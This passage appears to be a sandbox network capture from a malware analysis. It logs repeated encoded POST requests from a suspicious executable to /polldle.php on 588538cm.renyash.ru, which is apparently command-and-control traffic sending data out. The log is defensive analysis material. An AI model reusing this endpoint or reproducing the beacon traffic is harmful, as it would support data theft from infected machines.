                                                                                Data Ascii: XYT__DZ^T]UZP^YPP]Z^WSPX[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU .#E%+8%T&'/! ,58+X+?423*T.78!X?#X'/\/,
                                                                                Jan 11, 2025 23:33:54.505692959 CET25INHTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:33:54.757345915 CET805INHTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:33:54 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HF65MiuEEtOwV7556PcbUkS81xr%2F%2F1%2BNBi79rojnFio436eOw2sUpQW66e4ipE9uSzu3mWEcsDXvj5kwD08u90CQfqT1wPRteK9SSt8v8iIbYJjrYnq3Cv8ymNWdvmsh3XX60JfO"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085f03691b8cdd-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3401&min_rtt=2057&rtt_var=3460&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2823&delivery_rate=113946&cwnd=161&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                76192.168.2.450084104.21.38.84808604C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Jan 11, 2025 23:33:54.885668993 CET319OUTPOST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:33:55.239278078 CET2504OUTData Raw: 58 5e 54 57 5a 41 5a 5f 54 5d 55 5a 50 5b 59 58 50 50 5a 5f 57 56 50 5d 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: X^TWZAZ_T]UZP[YXPPZ_WVP][\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU 9#6A28Y%>$1S#%8+$(?&U5,4;#2]<5#X'/\/
                                                                                Jan 11, 2025 23:33:55.329160929 CET25INHTTP/1.1 100 Continue


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                77192.168.2.450085104.21.38.84808604C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Jan 11, 2025 23:33:55.339828968 CET319OUTPOST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 1620
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:33:55.692326069 CET1620OUTData Raw: 5d 5e 54 5f 5f 42 5a 51 54 5d 55 5a 50 5b 59 5b 50 5c 5a 59 57 50 50 5a 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: ]^T__BZQT]UZP[Y[P\ZYWPPZ[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU#-3)$;/$!!Y'5V"?:,;??2&S- Z!!;+5#X'/\/
                                                                                Jan 11, 2025 23:33:55.788103104 CET25INHTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:33:56.023619890 CET956INHTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:33:55 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kFxzWqZ989xdyDk%2BpdYZl8eHuHpXsHhTGR6zYH3VIi2MXxmzG%2BYkPvuq81gLjiY6xRyy%2FMxUiKFlMhYBZCoNFhAXXcZ%2BDoORsEnfizZgV9gTaZ1CklKC4gTUfTE1c5ScJSXdYwbO"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085f0b6e3e42f2-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3470&min_rtt=2160&rtt_var=3430&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1939&delivery_rate=115488&cwnd=221&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 39 38 0d 0a 0e 11 2d 0a 27 24 38 5b 29 07 2f 59 2d 06 0e 01 39 0f 0e 58 3d 0f 07 06 37 3a 38 13 31 31 23 0f 3c 5c 21 42 28 14 06 08 37 3d 3e 1c 26 13 23 46 0c 1d 21 01 3e 06 30 56 31 02 20 59 3f 55 29 04 25 31 20 45 3e 1a 37 50 3f 29 32 01 35 3c 35 0d 2b 0c 39 57 2a 35 31 02 38 31 33 5a 25 10 2e 51 0f 16 21 51 22 0f 20 16 23 3d 33 5c 25 20 0d 1c 28 37 38 59 26 2a 28 50 2b 23 03 03 28 22 01 0f 27 3e 23 1f 31 3f 04 19 3c 2a 3c 0e 2b 01 24 5c 23 0f 28 56 05 3f 5b 4d 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 98-'$8[)/Y-9X=7:811#<\!B(7=>&#F!>0V1 Y?U)%1 E>7P?)25<5+9W*51813Z%.Q!Q" #=3\% (78Y&*(P+#("'>#1?<*<+$\#(V?[M0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                78192.168.2.450086104.21.38.84808604C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Jan 11, 2025 23:33:55.459971905 CET319OUTPOST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:33:55.817405939 CET2504OUTData Raw: 58 5a 51 54 5a 45 5f 5a 54 5d 55 5a 50 5b 59 5f 50 53 5a 59 57 54 50 5e 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: XZQTZE_ZT]UZP[Y_PSZYWTP^[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU#B, 5&<2T)0?U#/%,7+?V% .T:(]!<(5#X'/\/
                                                                                Jan 11, 2025 23:33:55.922291994 CET25INHTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:33:56.143770933 CET819INHTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:33:56 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eMuSadz%2B0DaCokUNTlbH27Tp2MMwj%2FwNC%2FIJz2iVDv41rh6ZKTihf%2B5%2FZz%2BDWSUgv1INfBSR%2Bn61Moc2tH7QsOk%2BOtEYElA5vV4fNiEolRqiMCSiUlCmh%2B%2BYNlvuIHOUlUPBbBzj"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085f0c3c44de94-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=7940&min_rtt=1548&rtt_var=13366&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2823&delivery_rate=27709&cwnd=236&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                79192.168.2.450087104.21.38.84808604C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Jan 11, 2025 23:33:56.271917105 CET295OUTPOST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2500
                                                                                Expect: 100-continue
                                                                                Jan 11, 2025 23:33:56.629878044 CET2500OUTData Raw: 58 5b 54 56 5f 43 5a 5f 54 5d 55 5a 50 5c 59 5f 50 57 5a 58 57 50 50 5a 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: X[TV_CZ_T]UZP\Y_PWZXWPPZ[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU#.%( &"*'?!U4"/4(&3&:$#1#?#X'/\/
                                                                                Jan 11, 2025 23:33:56.734268904 CET25INHTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:33:56.908221006 CET806INHTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:33:56 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Qh%2Fhpb6O14KUbO6mQHFx0dgjlfujTCXEGzaBGX3PdFh%2BXQD8hwgm42W7JQ9cL9dHUHaFOCsv%2FNdFfyJnpoUMOiL9%2FJ2d6ubwUDYoVslG9Zog7jBKRGdCy4DpaTcRIQRsoKTS5iE0"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085f1149b80c9c-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=4109&min_rtt=1559&rtt_var=5686&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2795&delivery_rate=66469&cwnd=240&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                80192.168.2.450088104.21.38.84808604C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Jan 11, 2025 23:33:57.117902040 CET295OUTPOST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Jan 11, 2025 23:33:57.473679066 CET2504OUTData Raw: 5d 5d 54 54 5a 41 5a 5d 54 5d 55 5a 50 5e 59 51 50 51 5a 5b 57 55 50 58 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: ]]TTZAZ]T]UZP^YQPQZ[WUPX[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU#F.U&%8 Y1>'.#?&8;/++R$#-:;#"<#X'/\/,
                                                                                Jan 11, 2025 23:33:57.756728888 CET25INHTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:33:57.756763935 CET807INHTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:33:57 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=v%2F7AD6Ml92n5yfuI37Cz86hOra2SXtt4jqniTmy9WXOQju1KcUIQpqmv77wFD%2BMT8c49UlvBT7H2kcPUPadcmMfmrP%2B465RyFxVrOPOgGPN6g6lB3fsn7idGB%2FjRGBbLAcYt8bpp"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085f168c6a4363-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2266&min_rtt=1810&rtt_var=1590&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2799&delivery_rate=267497&cwnd=239&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0
                                                                                Jan 11, 2025 23:33:57.756782055 CET807INHTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:33:57 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=v%2F7AD6Ml92n5yfuI37Cz86hOra2SXtt4jqniTmy9WXOQju1KcUIQpqmv77wFD%2BMT8c49UlvBT7H2kcPUPadcmMfmrP%2B465RyFxVrOPOgGPN6g6lB3fsn7idGB%2FjRGBbLAcYt8bpp"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085f168c6a4363-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2266&min_rtt=1810&rtt_var=1590&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2799&delivery_rate=267497&cwnd=239&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                81192.168.2.450089104.21.38.84808604C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Jan 11, 2025 23:33:57.880202055 CET319OUTPOST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2500
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:33:58.239306927 CET2500OUTData Raw: 5d 5c 51 54 5a 41 5f 5f 54 5d 55 5a 50 5c 59 5a 50 5c 5a 5e 57 55 50 5c 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: ]\QTZA__T]UZP\YZP\Z^WUP\[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU -.C23&"=0?)W <=^;8<)?U%&.B<53[*%#X'/\/,
                                                                                Jan 11, 2025 23:33:58.341049910 CET25INHTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:33:58.610297918 CET810INHTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:33:58 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=94%2B%2BMTp3vl8qV3y8Ow9neIq%2BthSXmSbW%2BMNBXebVNfYyiwUKRaw5RWxAhIdVJJ%2FVaK5CdAm5RcbyjjbeFDPgF0VWqnuC8MP01Qn9402f0EJovwj9zgL21LfN1bX%2FZlgSjVG7wH8b"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085f1b59767c9f-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=4856&min_rtt=2041&rtt_var=6396&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2819&delivery_rate=59436&cwnd=220&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                82192.168.2.450090104.21.38.84808604C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Jan 11, 2025 23:33:58.819713116 CET319OUTPOST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:33:59.176841974 CET2504OUTData Raw: 5d 5c 54 5f 5a 46 5a 58 54 5d 55 5a 50 55 59 51 50 56 5a 59 57 56 50 5a 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: ]\T_ZFZXT]UZPUYQPVZYWVPZ[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU#F:02%3%22$1V4*,+?&06,$76 ?#X'/\/
                                                                                Jan 11, 2025 23:33:59.264226913 CET25INHTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:33:59.471590996 CET807INHTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:33:59 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nXvNy9Hufye%2BzTGNjg3PVVrZrummd4A5o8rSlSPCb2wHbbaDPjx%2FqSnwMgCLfmx5AoIOADWCBKW%2BbCLJ5H5GPZBu2WptU86bDUN1MafVIJJq7rtF79BRCZ4%2BdY81bqB93EzMxR0x"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085f212c677cea-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2499&min_rtt=1888&rtt_var=1930&sent=4&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2823&delivery_rate=215466&cwnd=225&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                83192.168.2.450091104.21.38.84808604C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Jan 11, 2025 23:33:59.601856947 CET319OUTPOST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:33:59.957998037 CET2504OUTData Raw: 5d 5a 54 53 5a 42 5f 5b 54 5d 55 5a 50 5f 59 58 50 56 5a 5d 57 5d 50 5f 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: ]ZTSZB_[T]UZP_YXPVZ]W]P_[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU -510]25$*",_/'(?1*V-4\!3\<5#X'/\/(
                                                                                Jan 11, 2025 23:34:00.051040888 CET25INHTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:34:00.323617935 CET804INHTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:34:00 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Oahk1BcYJXHaGPQTfif96NBR0pe1zMXca8AuG9zjMKyHDfp5vg3%2F9k6SkkYI7AgrFzNmU%2F81gniGJpFjfqO2ByMEeSPANSDxwkf5K8UJmQW%2FaomkcNnDhaGdZgVw4Vx2E5Smmmlp"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085f260cf14343-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1853&min_rtt=1789&rtt_var=799&sent=4&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2823&delivery_rate=634506&cwnd=243&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                84192.168.2.450092104.21.38.84808604C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Jan 11, 2025 23:34:00.545943975 CET319OUTPOST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:34:00.895585060 CET2504OUTData Raw: 5d 5d 54 56 5f 45 5a 5f 54 5d 55 5a 50 5d 59 5b 50 52 5a 5e 57 57 50 5c 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: ]]TV_EZ_T]UZP]Y[PRZ^WWP\[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU :U2D1; &1=$6 9;;()<+W132R-B;62/(#X'/\/
                                                                                Jan 11, 2025 23:34:01.011190891 CET25INHTTP/1.1 100 Continue


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                85192.168.2.450093104.21.38.84808604C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Jan 11, 2025 23:34:01.049936056 CET319OUTPOST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 1608
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
